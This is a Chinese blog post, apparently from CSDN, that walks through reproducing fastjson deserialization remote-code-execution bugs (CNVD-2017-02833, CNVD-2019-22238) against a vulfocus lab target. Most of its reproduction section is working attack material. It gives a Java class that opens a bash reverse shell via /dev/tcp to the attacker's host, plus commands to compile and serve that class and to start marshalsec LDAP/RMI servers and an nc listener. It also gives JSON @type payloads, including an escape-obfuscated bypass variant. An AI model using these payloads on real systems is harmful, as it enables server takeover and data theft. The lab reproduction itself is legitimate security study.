fastjson 反序列化RCE,远程命令执行漏洞CVE、CNVD(2022年12月最新)

已于 2023-08-01 15:17:27 修改
阅读量2.1k 收藏 3
点赞数 1
分类专栏: 漏洞挖掘 漏洞复现 fastjson反序列化 文章标签: fastjson反序列化 fastjson cnvd 漏洞复现 vulfocus
于 2022-12-18 21:33:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq1140037586/article/details/128365980
版权

1、前言

Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。

2、漏洞原理

漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增加,删除等操作,对服务器造成巨大影响。

原理解析:为了成功利用 Fastjson 1.2.47 RCE 反序列化漏洞,需要提前在 Kali 虚拟机中搭建 Web 服务器和 RMI 服务,随后当我们向 fastjson 服务器 POST 提交 POC 后,fastjson 服务器会访问远程 RMI 服务,RMI 再通过将请求重定向到 Web 服务器后下载存放在 Web服务器中的恶意 Java代码(已编译的反序列化类),从而成功实现远程命令执行

3、漏洞版本

fastjson 1.2.24 CNVD-2017-02833
fastjson 1.2.47 CNVD-2019-22238

4、漏洞复现

先下载攻击利用工具
https://github.com/RandomRobbieBF/marshalsec-jar

(1)使用ldap协议

将下面代码中的IP地址改为自己的攻击机地址,最后反弹shell接收的地址,保存为test.java文件

import java.lang.Runtime;
import java.lang.Process;

public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/xxx.xxx.230.165/6677 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

使用命令javac test.java 将java文件编译为class文件

javac test.java

启动一个http服务将刚刚编译的test.class文件挂起来

python -m SimpleHTTPServer 6001

在这里插入图片描述

攻击机先开启一个nc监听

nc -lvvp 6677

攻击机在marshalsec-0.0.3-SNAPSHOT-all.jar工具目录下使用如下命令启动Ldap监听

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://xxx.xxx.230.165:6001/#test" 1389

在这里插入图片描述
开始攻击:
访问靶场
在这里插入图片描述
使用Burp抓包,发送到重放模块,并修改GET为POST,添加payload
Payload1

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://xxx.xx.230.165:1389/test",
        "autoCommit":true
    }
}

Payload2

{
 "hrg786": {
   "@\u0074\x79\x70e": "Lcom.s\u0075n.\u0072\u006Fwse\x74\x2E\u004A\u0064\u0062c\u0052owS\u0065t\u0049mpl;",
   "dataSourceName": "ldap://xxx.xxx.230.165:1389/test",
   "autoCommit": true
 }
}

在这里插入图片描述
此时发现nc监听返回了shell
在这里插入图片描述

(2)使用rmi协议

前面的其他步骤都一样,在使用攻击工具步骤时,使用命令如下:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://XXX.XXX.230.165:6001/#test" 1099

在这里插入图片描述
抓包,使用payload:

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://175.24.230.165:1099/test",
        "autoCommit":true
    }
}

在这里插入图片描述
成功反弹shell
在这里插入图片描述

夏初春末_昊
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全深入学习第七课——热门框架漏洞RCEFastjson序列漏洞
p36273的博客
09-18 1661
json全称是JavaScript object notation。即JavaScript对象标记法,使用键值对进行信息的存储。"age":23,json本质就是一种字符串,用于信息的存储和交换。------ Fastjson 是一个阿里巴巴公司开源的 Java 语言编写的高性能功能完善的 JSON 库。可以将Java 对象转换为 JSON 格式(序列),当然它也可以将 JSON 字符串转换为 Java 对象(序列)。
Fastjson 1.2.47 RCE漏洞复现
wutiangui的博客
11-07 337
Fastjson提供了autotype功能,允许用户在序列数据中通过“@type”指定序列的类型,Fastjson自定义的序列机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且序列不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发现有回显。2.开启http服务。
漏洞复现】大华智能物联综合管理平台 fastjson远程代码执行漏洞
siu~
05-29 1147
由于大华智能物联综合管理平台使用了存在漏洞的Fastson组件,未经身份验让的攻击者可利用 /ev0-uns/v1.0/auths/sysusers/random接口发送恶意的序列数据执行任意指令,造成代码执行
Fastjson序列漏洞(1.2.24 RCE)
m0_61506558的博客
09-13 3039
Fastjson是一个JSON工具库,它的作用就是把java对象转换为json形式,也可以用来将json转换为java对象。@type引入这个功能的目的是在序列的时候防止子类中包含接口或抽象类的时候,类型丢失,这样我们在序列的时候就不需要再指定类名。
FastJson中AutoType序列漏洞
qq_53058639的博客
02-20 1295
Fastjson
【Vulfocus漏洞复现】fastjson-cnvd_2017_02833、fastjson-cnvd_2019_22238
weixin_45632448的博客
04-12 4411
vps:centos8 腾讯云 本地:windows11 靶场环境:http://123.58.236.76:24477/ 访问靶场环境:http://123.58.236.76:24477/ burp进行抓包,将请求方式改为POST,能够请求json数据,可能存在fastjson漏洞 准备两个东西:Exploit.class、marshalsec-0.0.3-SNAPSHOT-all.jar(准备过程不详述,网上都有) 在本地创建Exploit.java,内容如下 import java.io.Buf
RCE漏洞(远程命令执行
NSQ0207的博客
07-27 528
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
fastjson1.2.69序列远程代码执行漏洞介绍.docx
07-01
**Fastjson 1.2.69 序列远程代码执行漏洞详解** Fastjson 是阿里巴巴开源的一个高性能的 JSON 库,广泛应用于 Java 开发中,用于 JSON 的序列序列操作。然而,Fastjson 1.2.69 版本存在一个严重的序...
fastjson1.2.8 序列远程代码执行漏洞
05-08
astjson采用黑白名单的方法来防御序列漏洞,导致当黑客不断发掘新的序列Gadgets类时,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,造成远程命令执行漏洞。经研究,该漏洞利用门槛较低,可绕过...
预警事项:Fastjson序列远程代码执行漏洞风险预警
05-24
阿里巴巴发布关于Fastjson安全公告,在1.2.80及以下版本中存在序列风险。Fastjson是阿里巴巴的开源JSON解析库,可以解析JSON格式的字符串,支持将Java Bean序列为JSON字符串,也可以从JSON字符串序列到...
fastjson1.2.24序列RCE
最新发布
06-24
**Fastjson 1.2.24 序列远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列序列的库一样,Fastjson在某些版本...
Fastjson1.2.47以及之前的所有版本
10-26
Fastjson1.2.47以及之前的所有版本
springmvc fastjson 序列时间格式方法(推荐)
10-20
在Spring MVC中,Fastjson是一个常用的JSON库,用于序列序列Java对象。当我们在处理日期时间字段时,可能会遇到序列时日期格式不一致的问题,导致默认显示为时间戳。本文将详细介绍两种解决Spring MVC中...
复现-fastjson远程命令执行漏洞
luson2014的博客
12-12 4217
fastjson远程命令执行漏洞 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列为 JSON 字符串,也可以从 JSON 字符串序列到 JavaBean。 Fastjson是一个Java库,可用于将Java对象转换为其JSON表示形式。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个序列远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。
(2022年12月最新)spring-core-rce漏洞复现CVE-2022-22965
qq1140037586的博客
12-21 1721
2022年3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列机制,可导致远程代码执行 (RCE),使用JDK9及以上版本皆有可能受到影响。通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
Fastjson再曝序列漏洞,网友:Bugson又来了!
程序猿DD
05-25 303
近日,Fastjson Develop Team 发布修复了 Fastjson 1.2.80 及之前版本存在的安全风险,该安全风险可能导致序列漏洞漏洞描述Fastjson 是阿里巴巴开源的 Java 对象和 JSON 格式字符串的快速转换的工具库。Fastjson 1.2.80 及之前版本使用黑白名单用于防御序列漏洞,经研究该防御策略在特定条件下可绕过默认 au...
Fastjson序列漏洞分析
热门推荐
fly小灰灰的专栏
07-30 1万+
1. 漏洞描述 漏洞简述: 2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。 影响版本: fastjson <= 1.2.24 2. 漏洞简介  java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastj
Wordpress 4.6 任意命令执行漏洞
锋刃科技的博客
06-12 4829
1、简介 WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 2、影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 3、环境搭建 我们这里使用vulhub和docker搭建环境 cd vulhub/wordpress/pwnscriptum docker-compose build docke
技术分享 | Fastjson-RCE漏洞复现
Jeeseen123的博客
05-26 472
Fastjson提供autotype功能,允许用户在序列数据中通过 @type 指定序列的类型,其次Fastjson自定义的序列会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且序列不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受弹shell 系统:Win10 x64 安装nc,burpsuit
fastjson 1.2.24 序列导致任意命令执行漏洞
03-16
fastjson 1.2.24 存在序列漏洞,攻击者可以利用该漏洞执行任意命令。该漏洞的原因是 fastjson序列时未对恶意数据进行足够的校验,导致攻击者可以构造恶意数据,使其被 fastjson 解析时执行任意命令。建议用户尽快升级 fastjson 版本,或者采取其他安全措施来防范该漏洞的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值